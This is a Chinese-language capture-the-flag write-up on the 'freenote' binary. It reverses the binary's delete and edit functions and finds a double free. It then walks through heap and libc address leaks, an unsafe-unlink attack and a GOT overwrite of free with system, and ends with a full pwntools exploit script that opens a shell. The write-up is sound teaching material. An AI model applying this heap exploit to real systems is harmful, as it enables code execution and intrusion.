Note 成员 content| ||| 0x00400edc e85ff8ffff call sym.imp.realloc ; void *realloc(void *ptr, size_t size)| ||| 0x00400ee1 4889c1 mov rcx, rax| ||| 0x00400ee4 8b45e8 mov eax, dword [local_18h]| ||| 0x00400ee7 4863d0 movsxd rdx, eax| ||| 0x00400eea 4889d0 mov rax, rdx| ||| 0x00400eed 4801c0 add rax, rax ; '#'| ||| 0x00400ef0 4801d0 add rax, rdx ; '('| ||| 0x00400ef3 48c1e003 shl rax, 3| ||| 0x00400ef7 4801d8 add rax, rbx ; '%'| ||| 0x00400efa 4883c020 add rax, 0x20| ||| 0x00400efe 488908 mov qword [rax], rcx| ||| 0x00400f01 488b35a01120. mov rsi, qword [0x006020a8] ; [0x6020a8:8]=0| ||| 0x00400f08 8b45e4 mov eax, dword [local_1ch]| ||| 0x00400f0b 4863c8 movsxd rcx, eax| ||| 0x00400f0e 8b45e8 mov eax, dword [local_18h]| ||| 0x00400f11 4863d0 movsxd rdx, eax| ||| 0x00400f14 4889d0 mov rax, rdx| ||| 0x00400f17 4801c0 add rax, rax ; '#'| ||| 0x00400f1a 4801d0 add rax, rdx ; '('| ||| 0x00400f1d 48c1e003 shl rax, 3| ||| 0x00400f21 4801f0 add rax, rsi ; '+'| ||| 0x00400f24 4883c010 add rax, 0x10| ||| 0x00400f28 48894808 mov qword [rax + 8], rcx ; 将新的大小写回 Note 的 length| ||| ; JMP XREF from 0x00400e6f (sub.Note_number:_d87)| |`--> 0x00400f2c bf91124000 mov edi, str.Enter_your_note: ; 0x401291 ; "Enter your note: "| | | 0x00400f31 b800000000 mov eax, 0| | | 0x00400f36 e8a5f7ffff call sym.imp.printf ; int printf(const char *format)| | | 0x00400f3b 488b0d661120. mov rcx, qword [0x006020a8] ; [0x6020a8:8]=0| | | 0x00400f42 8b45e8 mov eax, dword [local_18h]| | | 0x00400f45 4863d0 movsxd rdx, eax| | | 0x00400f48 4889d0 mov rax, rdx| | | 0x00400f4b 4801c0 add rax, rax ; '#'| | | 0x00400f4e 4801d0 add rax, rdx ; '('| | | 0x00400f51 48c1e003 shl rax, 3| | | 0x00400f55 4801c8 add rax, rcx ; '&'| | | 0x00400f58 4883c020 add rax, 0x20| | | 0x00400f5c 488b00 mov rax, qword [rax]| | | 0x00400f5f 8b55e4 mov edx, dword [local_1ch]| | | 0x00400f62 89d6 mov esi, edx| | | 0x00400f64 4889c7 mov rdi, rax| | | 0x00400f67 e8f1f8ffff call sub.read_85d ; ssize_t read(int fildes, void *buf, size_t nbyte) ; 读入新的笔记内容| | | 0x00400f6c bfa3124000 mov edi, str.Done. ; 0x4012a3 ; "Done."| | | 0x00400f71 e84af7ffff call sym.imp.puts ; int puts(const char *s)| | | ; JMP XREF from 0x00400dfb (sub.Note_number:_d87)| | | ; JMP XREF from 0x00400e2c (sub.Note_number:_d87)| `-`-> 0x00400f76 4883c418 add rsp, 0x18| 0x00400f7a 5b pop rbx| 0x00400f7b 5d pop rbp\ 0x00400f7c c3 ret
该函数在输入了笔记序号和大小之后,会先判断新的大小与现在的大小是否相同,如果相同,则不重新分配空间,直接编辑其内容,否则调用 realloc() 重新分配一块空间(地址可能与原地址相同,也可能不相同)。
Delete 的实现如下:
[0x00400770]> pdf @ sub.No_notes_yet._f7d/ (fcn) sub.No_notes_yet._f7d 266| sub.No_notes_yet._f7d ();| ; var int local_4h @ rbp-0x4| ; var int local_0h @ rbp-0x0| ; CALL XREF from 0x004010ec (main + 101)| 0x00400f7d 55 push rbp| 0x00400f7e 4889e5 mov rbp, rsp| 0x00400f81 4883ec10 sub rsp, 0x10| 0x00400f85 488b051c1120. mov rax, qword [0x006020a8] ; [0x6020a8:8]=0| 0x00400f8c 488b4008 mov rax, qword [rax + 8] ; [0x8:8]=-1 ; 8| 0x00400f90 4885c0 test rax, rax ; 检查 Notes 成员 length 是否为零,即是否有笔记| ,=< 0x00400f93 0f8ee2000000 jle 0x40107b| | 0x00400f99 bfa9124000 mov edi, str.Note_number: ; 0x4012a9 ; "Note number: "| | 0x00400f9e b800000000 mov eax, 0| | 0x00400fa3 e838f7ffff call sym.imp.printf ; int printf(const char *format)| | 0x00400fa8 b800000000 mov eax, 0| | 0x00400fad e89cf9ffff call sub.atoi_94e ; int atoi(const char *str)| | 0x00400fb2 8945fc mov dword [local_4h], eax ; [local_4h] 为要删除笔记的序号| | 0x00400fb5 837dfc00 cmp dword [local_4h], 0 ; 检查笔记序号是否有效| ,==< 0x00400fb9 7815 js 0x400fd0| || 0x00400fbb 8b45fc mov eax, dword [local_4h]| || 0x00400fbe 4863d0 movsxd rdx, eax| || 0x00400fc1 488b05e01020. mov rax, qword [0x006020a8] ; [0x6020a8:8]=0| || 0x00400fc8 488b00 mov rax, qword [rax]| || 0x00400fcb 4839c2 cmp rdx, rax| ,===< 0x00400fce 7c0f jl 0x400fdf| ||| ; JMP XREF from 0x00400fb9 (sub.No_notes_yet._f7d)| |`--> 0x00400fd0 bfb7124000 mov edi, str.Invalid_number ; 0x4012b7 ; "Invalid number!"| | | 0x00400fd5 e8e6f6ffff call sym.imp.puts ; int puts(const char *s)| |,==< 0x00400fda e9a6000000 jmp 0x401085| ||| ; JMP XREF from 0x00400fce (sub.No_notes_yet._f7d)| `---> 0x00400fdf 488b05c21020. mov rax, qword [0x006020a8] ; [0x6020a8:8]=0| || 0x00400fe6 488b5008 mov rdx, qword [rax + 8] ; [0x8:8]=-1 ; 8 ; 取出 Notes 成员 length| || 0x00400fea 4883ea01 sub rdx, 1 ; 将 length -1| || 0x00400fee 48895008 mov qword [rax + 8], rdx ; 将新的 length 写回去| || 0x00400ff2 488b0daf1020. mov rcx, qword [0x006020a8] ; [0x6020a8:8]=0| || 0x00400ff9 8b45fc mov eax, dword [local_4h]| || 0x00400ffc 4863d0 movsxd rdx, eax| || 0x00400fff 4889d0 mov rax, rdx| || 0x00401002 4801c0 add rax, rax ; '#'| || 0x00401005 4801d0 add rax, rdx ; '('| || 0x00401008 48c1e003 shl rax, 3| || 0x0040100c 4801c8 add rax, rcx ; '&'| || 0x0040100f 4883c010 add rax, 0x10| || 0x00401013 48c700000000. mov qword [rax], 0 ; 修改 Note 成员 isValid 为 0| || 0x0040101a 488b0d871020. mov rcx, qword [0x006020a8] ; [0x6020a8:8]=0| || 0x00401021 8b45fc mov eax, dword [local_4h]| || 0x00401024 4863d0 movsxd rdx, eax| || 0x00401027 4889d0 mov rax, rdx| || 0x0040102a 4801c0 add rax, rax ; '#'| || 0x0040102d 4801d0 add rax, rdx ; '('| || 0x00401030 48c1e003 shl rax, 3| || 0x00401034 4801c8 add rax, rcx ; '&'| || 0x00401037 4883c010 add rax, 0x10| || 0x0040103b 48c740080000. mov qword [rax + 8], 0 ; 修改 Note 成员 length 为 0| || 0x00401043 488b0d5e1020. mov rcx, qword [0x006020a8] ; [0x6020a8:8]=0| || 0x0040104a 8b45fc mov eax, dword [local_4h]| || 0x0040104d 4863d0 movsxd rdx, eax| || 0x00401050 4889d0 mov rax, rdx| || 0x00401053 4801c0 add rax, rax ; '#'| || 0x00401056 4801d0 add rax, rdx ; '('| || 0x00401059 48c1e003 shl rax, 3| || 0x0040105d 4801c8 add rax, rcx ; '&'| || 0x00401060 4883c020 add rax, 0x20| || 0x00401064 488b00 mov rax, qword [rax]| || 0x00401067 4889c7 mov rdi, rax ; rdi 为 Note 成员 content 指向的地址| || 0x0040106a e841f6ffff call sym.imp.free ; void free(void *ptr)| || 0x0040106f bfa3124000 mov edi, str.Done. ; 0x4012a3 ; "Done."| || 0x00401074 e847f6ffff call sym.imp.puts ; int puts(const char *s)| ,===< 0x00401079 eb0a jmp 0x401085| ||| ; JMP XREF from 0x00400f93 (sub.No_notes_yet._f7d)| ||`-> 0x0040107b bfd8124000 mov edi, str.No_notes_yet. ; 0x4012d8 ; "No notes yet."| || 0x00401080 e83bf6ffff call sym.imp.puts ; int puts(const char *s)| || ; JMP XREF from 0x00400fda (sub.No_notes_yet._f7d)| || ; JMP XREF from 0x00401079 (sub.No_notes_yet._f7d)| ``--> 0x00401085 c9 leave\ 0x00401086 c3 ret
该函数在读入要删除的笔记序号后,首先将 Notes 结构体成员 length -1,然后将对应的 Note 结构体的 isValid 和 length 修改为 0,然后 free 掉笔记的内容(*content)。
漏洞利用
在上面逆向的过程中我们发现,程序存在 double free 漏洞。在 Delete 的时候,只是设置了 isValid =0 作为标记,而没有将该笔记从 Notes 中移除,也没有将 content 设置为 NULL,然后就调用了 free 函数。整个过程没有对 isValid 是否已经为 0 做任何检查。于是我们可以对同一个笔记 Delete 两次,造成 double free,修改 GOT 表,改变程序的执行流。
泄漏地址
第一步先泄漏堆地址。为方便调试,就先关掉 ASLR 吧:
gef➤ vmmap heapStart End Offset Perm Path0x0000000000603000 0x0000000000625000 0x0000000000000000 rw- [heap]gef➤ vmmap libcStart End Offset Perm Path0x00007ffff7a15000 0x00007ffff7bd0000 0x0000000000000000 r-x /home/firmy/libc-2.19.so0x00007ffff7bd0000 0x00007ffff7dcf000 0x00000000001bb000 --- /home/firmy/libc-2.19.so0x00007ffff7dcf000 0x00007ffff7dd3000 0x00000000001ba000 r-- /home/firmy/libc-2.19.so0x00007ffff7dd3000 0x00007ffff7dd5000 0x00000000001be000 rw- /home/firmy/libc-2.19.so
为了泄漏堆地址,我们需要释放 2 个不相邻且不会被合并进 top chunk 里的 chunk,所以我们创建 4 个笔记,可以看到由初始化阶段创建的 Notes 和 Note 结构体:
for i in range(4):newnote("A"*8)
gef➤ x/16gx 0x006030000x603000: 0x0000000000000000 0x00000000000018210x603010: 0x0000000000000100 0x0000000000000004 <-- Notes.max <-- Notes.length0x603020: 0x0000000000000001 0x0000000000000008 <-- Notes.notes[0].isValid <-- Notes.notes[0].length0x603030: 0x0000000000604830 0x0000000000000001 <-- Notes.notes[0].content0x603040: 0x0000000000000008 0x00000000006048c00x603050: 0x0000000000000001 0x00000000000000080x603060: 0x0000000000604950 0x00000000000000010x603070: 0x0000000000000008 0x00000000006049e0
下面是创建的 4 个笔记:
gef➤ x/4gx 0x00603000+0x18200x604820: 0x0000000000000000 0x0000000000000091 <-- chunk 00x604830: 0x4141414141414141 0x0000000000000000 <-- *notes[0].contentgef➤ x/4gx 0x00603000+0x1820+0x90*10x6048b0: 0x0000000000000000 0x0000000000000091 <-- chunk 10x6048c0: 0x4141414141414141 0x0000000000000000 <-- *notes[1].contentgef➤ x/4gx 0x00603000+0x1820+0x90*20x604940: 0x0000000000000000 0x0000000000000091 <-- chunk 20x604950: 0x4141414141414141 0x0000000000000000 <-- *notes[2].contentgef➤ x/4gx 0x00603000+0x1820+0x90*30x6049d0: 0x0000000000000000 0x0000000000000091 <-- chunk 30x6049e0: 0x4141414141414141 0x0000000000000000 <-- *notes[3].contentgef➤ x/4gx 0x00603000+0x1820+0x90*40x604a60: 0x0000000000000000 0x00000000000205a1 <-- top chunk0x604a70: 0x0000000000000000 0x0000000000000000
现在我们释放掉 chunk 0 和 chunk 2:
delnote(0)delnote(2)
gef➤ x/16gx 0x006030000x603000: 0x0000000000000000 0x00000000000018210x603010: 0x0000000000000100 0x0000000000000002 <-- Notes.length0x603020: 0x0000000000000000 0x0000000000000000 <-- notes[0].isValid <-- notes[0].length0x603030: 0x0000000000604830 0x0000000000000001 <-- notes[0].content0x603040: 0x0000000000000008 0x00000000006048c00x603050: 0x0000000000000000 0x0000000000000000 <-- notes[2].isValid <-- notes[2].length0x603060: 0x0000000000604950 0x0000000000000001 <-- notes[2].content0x603070: 0x0000000000000008 0x00000000006049e0gef➤ x/4gx 0x00603000+0x18200x604820: 0x0000000000000000 0x0000000000000091 <-- chunk 0 [be freed]0x604830: 0x00007ffff7dd37b8 0x0000000000604940 <-- fd->main_arena+88 <-- bk->chunk 2gef➤ x/4gx 0x00603000+0x1820+0x90*10x6048b0: 0x0000000000000090 0x0000000000000090 <-- chunk 10x6048c0: 0x4141414141414141 0x0000000000000000gef➤ x/4gx 0x00603000+0x1820+0x90*20x604940: 0x0000000000000000 0x0000000000000091 <-- chunk 2 [be freed]0x604950: 0x0000000000604820 0x00007ffff7dd37b8 <-- fd->chunk 0 <-- bk->main_arena+88gef➤ x/4gx 0x00603000+0x1820+0x90*30x6049d0: 0x0000000000000090 0x0000000000000090 <-- chunk 30x6049e0: 0x4141414141414141 0x0000000000000000gef➤ x/4gx 0x00603000+0x1820+0x90*40x604a60: 0x0000000000000000 0x00000000000205a1 <-- top chunk0x604a70: 0x0000000000000000 0x0000000000000000
chunk 0 和 chunk 2 被放进了 unsorted bin,且它们的 fd 和 bk 指针有我们需要的地址。
为了泄漏堆地址,我们分配一个内容长度为 8 的笔记,malloc 将从 unsorted bin 中把原来 chunk 0 的空间取出来:
newnote("A"*8)
gef➤ x/16gx 0x006030000x603000: 0x0000000000000000 0x00000000000018210x603010: 0x0000000000000100 0x0000000000000003 <-- Notes.length0x603020: 0x0000000000000001 0x0000000000000008 <-- notes[0].isValid <-- notes[0].length0x603030: 0x0000000000604830 0x0000000000000001 <-- notes[0].content0x603040: 0x0000000000000008 0x00000000006048c00x603050: 0x0000000000000000 0x0000000000000000 <-- notes[2].isValid <-- notes[2].length0x603060: 0x0000000000604950 0x0000000000000001 <-- notes[2].content0x603070: 0x0000000000000008 0x00000000006049e0gef➤ x/4gx 0x00603000+0x18200x604820: 0x0000000000000000 0x0000000000000091 <-- chunk 00x604830: 0x4141414141414141 0x0000000000604940 <-- info leakgef➤ x/4gx 0x00603000+0x1820+0x90*10x6048b0: 0x0000000000000090 0x0000000000000091 <-- chunk 10x6048c0: 0x4141414141414141 0x0000000000000000gef➤ x/4gx 0x00603000+0x1820+0x90*20x604940: 0x0000000000000000 0x0000000000000091 <-- chunk 2 [be freed]0x604950: 0x00007ffff7dd37b8 0x00007ffff7dd37b8 <-- fd->chunk 0 <-- bk->main_arena+88gef➤ x/4gx 0x00603000+0x1820+0x90*30x6049d0: 0x0000000000000090 0x0000000000000090 <-- chunk 30x6049e0: 0x4141414141414141 0x0000000000000000gef➤ x/4gx 0x00603000+0x1820+0x90*40x604a60: 0x0000000000000000 0x00000000000205a1 <-- top chunk0x604a70: 0x0000000000000000 0x0000000000000000
为什么是 8 呢?我们同样可以看到程序的读入是有问题的,没有在字符串末尾加上 \0,导致了信息泄漏的发生,接下来只要调用 List 就可以把 chunk 2 的地址 0x604940 打印出来。然后根据 chunk 2 的偏移,即可计算出堆起始地址:
s = listnote(0)[8:]heap_addr = u64((s.ljust(8, "\x00"))[:8])heap_base = heap_addr - 0x1940 # 0x1940 = 0x1820 + 0x90*2
其实我们还可以得到 libc 的地址,方法如下:
gef➤ x/20gx 0x00007ffff7dd37b8-0x780x7ffff7dd3740 <__malloc_hook>: 0x0000000000000000 0x00000000000000000x7ffff7dd3750: 0x0000000000000000 0x00000000000000000x7ffff7dd3760: 0x0000000100000000 0x0000000000000000 <-- main_arena0x7ffff7dd3770: 0x0000000000000000 0x00000000000000000x7ffff7dd3780: 0x0000000000000000 0x00000000000000000x7ffff7dd3790: 0x0000000000000000 0x00000000000000000x7ffff7dd37a0: 0x0000000000000000 0x00000000000000000x7ffff7dd37b0: 0x0000000000000000 0x0000000000604a60 <-- top0x7ffff7dd37c0: 0x0000000000000000 0x00000000006049400x7ffff7dd37d0: 0x0000000000604820 0x00007ffff7dd37c8
我们看到 __malloc_hook 在这个地址 0x00007ffff7dd37b8-0x78 的地方。其实 0x7ffff7dd3760 地方开始就是 main_arena,但在这个 libc 里符号被 stripped 扔掉了。看一下 __malloc_hook 在 libc 中的偏移:
$ readelf -s libc-2.19.so | grep __malloc_hook1079: 00000000003be740 8 OBJECT WEAK DEFAULT 31 __malloc_hook@@GLIBC_2.2.5
因为偏移是不变的,我们总是可以计算出 libc 的地址:
libc_base = leak_addr - (0x3be740 + 0x78)
过程和泄漏堆地址是一样的,这里就不展示了,代码如下:
newnote("A"*8)s = listnote(2)[8:]libc_addr = u64((s.ljust(8, "\x00"))[:8])libc_base = libc_addr - (0x3be740 + 0x78) # __malloc_hook + 0x78
这一步的最后只要把创建的所有笔记都删掉就好了:
gef➤ x/16gx 0x006030000x603000: 0x0000000000000000 0x00000000000018210x603010: 0x0000000000000100 0x00000000000000000x603020: 0x0000000000000000 0x00000000000000000x603030: 0x0000000000604830 0x00000000000000000x603040: 0x0000000000000000 0x00000000006048c00x603050: 0x0000000000000000 0x00000000000000000x603060: 0x0000000000604950 0x00000000000000000x603070: 0x0000000000000000 0x00000000006049e0gef➤ x/4gx 0x00603000+0x18200x604820: 0x0000000000000000 0x00000000000207e10x604830: 0x00007ffff7dd37b8 0x00007ffff7dd37b8gef➤ x/4gx 0x00603000+0x1820+0x90*10x6048b0: 0x0000000000000090 0x00000000000000900x6048c0: 0x4141414141414141 0x0000000000000000gef➤ x/4gx 0x00603000+0x1820+0x90*20x604940: 0x0000000000000120 0x00000000000000900x604950: 0x4141414141414141 0x00007ffff7dd37b8gef➤ x/4gx 0x00603000+0x1820+0x90*30x6049d0: 0x00000000000001b0 0x0000000000000090 <-- chunk 3 [be freed]0x6049e0: 0x4141414141414141 0x0000000000000000gef➤ x/4gx 0x00603000+0x1820+0x90*40x604a60: 0x0000000000000000 0x00000000000205a10x604a70: 0x0000000000000000 0x0000000000000000
所有的 chunk 都被合并到了 top chunk 里,需要重点关注的是 chunk 3 的 prev_size 字段:
0x6049d0 - 0x1b0 = 0x604820
所以其实它指向的是 chunk 0,如果再次释放 chunk 3,它会根据 prev_size 找到 chunk 0,并执行 unlink,然而如果直接这样做的话,马上就被 libc 检查出来了,double free 异常被触发,程序崩溃。所以我们接下来我们通过修改 prev_size 指向一个 fake chunk,来成功 unlink。
unlink
有了堆地址,根据 unlink 攻击的一般思想,我们总共创建 3 块 chunk,在 chunk 0 中构造 fake chunk,在 chunk 1 中放置 /bin/sh 字符串,用来作为 system() 函数的参数,chunk 2 里再放置两个 fake chunk:
newnote(p64(0) + p64(0) + p64(heap_base + 0x18) + p64(heap_base + 0x20)) # note 0newnote('/bin/sh\x00') # note 1newnote("A"*128 + p64(0x1a0)+p64(0x90)+"A"*128 + p64(0)+p64(0x21)+"A"*24 + "\x01") # note 2
为什么这样构造呢?回顾一下 unlink 的操作如下:
FD = P->fd;BK = P->bk;FD->bk = BKBK->fd = FD
需要绕过的检查:
(P->fd->bk != P || P->bk->fd != P) == False
最终效果是:
FD->bk = P = BK = &P - 16BK->fd = P = FD = &P - 24
为了绕过它,我们需要一个指向 chunk 头的指针,通过前面的分析我们知道 Note.content 正好指向 chunk 头,而且没有被置空,那么就可以通过泄漏出来的堆地址计算出这个指针的地址。
全部堆块的情况如下:
gef➤ x/4gx 0x6030180x603018: 0x0000000000000003 0x00000000000000010x603028: 0x0000000000000020 0x0000000000604830 <-- bk pointergef➤ x/4gx 0x6030200x603020: 0x0000000000000001 0x00000000000000200x603030: 0x0000000000604830 0x0000000000000001 <-- fd pointergef➤ x/90gx 0x00603000+0x18200x604820: 0x0000000000000000 0x0000000000000091 <-- chunk 00x604830: 0x0000000000000000 0x0000000000000000 <-- fake chunk0x604840: 0x0000000000603018 0x0000000000603020 <-- fd pointer <-- bk pointer0x604850: 0x0000000000000000 0x00000000000000000x604860: 0x0000000000000000 0x00000000000000000x604870: 0x0000000000000000 0x00000000000000000x604880: 0x0000000000000000 0x00000000000000000x604890: 0x0000000000000000 0x00000000000000000x6048a0: 0x0000000000000000 0x00000000000000000x6048b0: 0x0000000000000090 0x0000000000000091 <-- chunk 10x6048c0: 0x0068732f6e69622f 0x0000000000000000 <-- '/bin/sh'0x6048d0: 0x0000000000000000 0x00000000000000000x6048e0: 0x0000000000000000 0x00000000000000000x6048f0: 0x0000000000000000 0x00000000000000000x604900: 0x0000000000000000 0x00000000000000000x604910: 0x0000000000000000 0x00000000000000000x604920: 0x0000000000000000 0x00000000000000000x604930: 0x0000000000000000 0x00000000000000000x604940: 0x0000000000000120 0x0000000000000191 <-- chunk 20x604950: 0x4141414141414141 0x41414141414141410x604960: 0x4141414141414141 0x41414141414141410x604970: 0x4141414141414141 0x41414141414141410x604980: 0x4141414141414141 0x41414141414141410x604990: 0x4141414141414141 0x41414141414141410x6049a0: 0x4141414141414141 0x41414141414141410x6049b0: 0x4141414141414141 0x41414141414141410x6049c0: 0x4141414141414141 0x41414141414141410x6049d0: 0x00000000000001a0 0x0000000000000090 <-- chunk 3 pointer0x6049e0: 0x4141414141414141 0x41414141414141410x6049f0: 0x4141414141414141 0x41414141414141410x604a00: 0x4141414141414141 0x41414141414141410x604a10: 0x4141414141414141 0x41414141414141410x604a20: 0x4141414141414141 0x41414141414141410x604a30: 0x4141414141414141 0x41414141414141410x604a40: 0x4141414141414141 0x41414141414141410x604a50: 0x4141414141414141 0x41414141414141410x604a60: 0x0000000000000000 0x0000000000000021 <-- fake next chunk PREV_INUSE0x604a70: 0x4141414141414141 0x41414141414141410x604a80: 0x4141414141414141 0x0000000000000001 <-- fake next next chunk PREV_INUSE0x604a90: 0x0000000000000000 0x00000000000000000x604aa0: 0x0000000000000000 0x00000000000000000x604ab0: 0x0000000000000000 0x00000000000000000x604ac0: 0x0000000000000000 0x00000000000000000x604ad0: 0x0000000000000000 0x0000000000020531 <-- top chunk0x604ae0: 0x0000000000000000 0x0000000000000000
首先是 chunk 0,在它里面包含了一个 fake chunk,且设置了 bk、fd 指针用于绕过检查。
chunk 2 分配了很大的空间,把 chunk 3 指针也包含了进去,这样就可以对 chunk 3 的 prev_size 进行设置,我们将其修改为 0x1a0,于是 0x6049d0 - 0x1a0 = 0x604830,即 fake chunk 的位置。另外,在释放 chunk 3 时,libc 会检查后一个堆块的 PREV_INUSE 标志位,同时也为了防止 free 后的 chunk 被合并进 top chunk,所以需要在 chunk 3 后布置一个 fake chunk,同样的 fake chunk 的后一个堆块也必须是 PREV_INUSE 的,以防止 chunk 3 与 fake chunk 合并。
接下来就是释放 chunk 3,触发 unlink:
delnote(3)
gef➤ x/16gx 0x006030000x603000: 0x0000000000000000 0x00000000000018210x603010: 0x0000000000000100 0x00000000000000020x603020: 0x0000000000000001 0x00000000000000200x603030: 0x0000000000603018 0x0000000000000001 <-- notes[0].content0x603040: 0x0000000000000008 0x00000000006048c00x603050: 0x0000000000000001 0x00000000000001390x603060: 0x0000000000604950 0x00000000000000000x603070: 0x0000000000000000 0x00000000006049e0
我们看到,note 0 的 content 指针被修改了,原本指向 fake chunk,现在却指向了自身地址减 0x18 的位置,这意味着我们可以将其改为任意地址。
overwrite note
这一步我们利用 Edit 功能先将 notes[0].content 该为 free@got:
editnote(0, p64(2) + p64(1)+p64(8)+p64(elf.got['free']))
gef➤ x/16gx 0x006030000x603000: 0x0000000000000000 0x00000000000018210x603010: 0x0000000000000100 0x00000000000000020x603020: 0x0000000000000001 0x0000000000000008 <-- notes[0].length = 80x603030: 0x0000000000602018 0x0000000000000001 <-- notes[0].content = free@got0x603040: 0x0000000000000008 0x00000000006048c00x603050: 0x0000000000000001 0x00000000000001390x603060: 0x0000000000604950 0x00000000000000000x603070: 0x0000000000000000 0x00000000006049e0gef➤ x/gx 0x6020180x602018 <free@got.plt>: 0x00007ffff7a97df0
另外这里将 length 设置为 8 也是有意义的,因为我们下一步修改 free 的地址为 system 地址,正好是 8 个字符长度,程序直接编辑其内容而不会调用 realloc 重新分配空间:
editnote(0, p64(system_addr))
gef➤ x/gx 0x6020180x602018 <free@got.plt>: 0x00007ffff7a5b640gef➤ p system$1 = {<text variable, no debug info>} 0x7ffff7a5b640 <system>
于是最后一步调用 free 时,实际上是调用了 system('/bin/sh'):
delnote(1)
gef➤ x/s 0x6048c00x6048c0: "/bin/sh"
pwn
开启 ASLR。Bingo!!!
$ python exp.py[+] Starting local process './freenote': pid 30146[*] heap base: 0x23b5000[*] libc base: 0x7efc6903e000[*] system address: 0x7efc69084640[*] Switching to interactive mode$ whoamifirmy
exploit
完整的 exp 如下:
from pwn import *io = process(['./freenote'], env={'LD_PRELOAD':'./libc-2.19.so'})elf = ELF('freenote')libc = ELF('libc-2.19.so')def newnote(x):io.recvuntil("Your choice: ")io.sendline("2")io.recvuntil("Length of new note: ")io.sendline(str(len(x)))io.recvuntil("Enter your note: ")io.send(x)def delnote(x):io.recvuntil("Your choice: ")io.sendline("4")io.recvuntil("Note number: ")io.sendline(str(x))def listnote(x):io.recvuntil("Your choice: ")io.sendline("1")io.recvuntil("%d. " % x)return io.recvline(keepends=False)def editnote(x, s):io.recvuntil("Your choice: ")io.sendline("3")io.recvuntil("Note number: ")io.sendline(str(x))io.recvuntil("Length of note: ")io.sendline(str(len(s)))io.recvuntil("Enter your note: ")io.send(s)def leak_base():global heap_baseglobal libc_basefor i in range(4):newnote("A"*8)delnote(0)delnote(2)newnote("A"*8) # note 0s = listnote(0)[8:]heap_addr = u64((s.ljust(8, "\x00"))[:8])heap_base = heap_addr - 0x1940 # 0x1940 = 0x1820 + 0x90*2log.info("heap base: 0x%x" % heap_base)newnote("A"*8) # note 2s = listnote(2)[8:]libc_addr = u64((s.ljust(8, "\x00"))[:8])libc_base = libc_addr - (libc.symbols['__malloc_hook'] + 0x78) # 0x78 = libc_addr - __malloc_hook_addrlog.info("libc base: 0x%x" % libc_base)for i in range(4):delnote(i)def unlink():newnote(p64(0) + p64(0) + p64(heap_base + 0x18) + p64(heap_base + 0x20)) # note 0newnote('/bin/sh\x00') # note 1newnote("A"*128 + p64(0x1a0)+p64(0x90)+"A"*128 + p64(0)+p64(0x21)+"A"*24 + "\x01") # note 2delnote(3) # double freedef overwrite_note():system_addr = libc_base + libc.symbols['system']log.info("system address: 0x%x" % system_addr)editnote(0, p64(2) + p64(1)+p64(8)+p64(elf.got['free'])) # Note.content = free_goteditnote(0, p64(system_addr)) # free => systemdef pwn():delnote(1) # system('/bin/sh')io.interactive()if __name__ == "__main__":leak_base()unlink()overwrite_note()pwn()
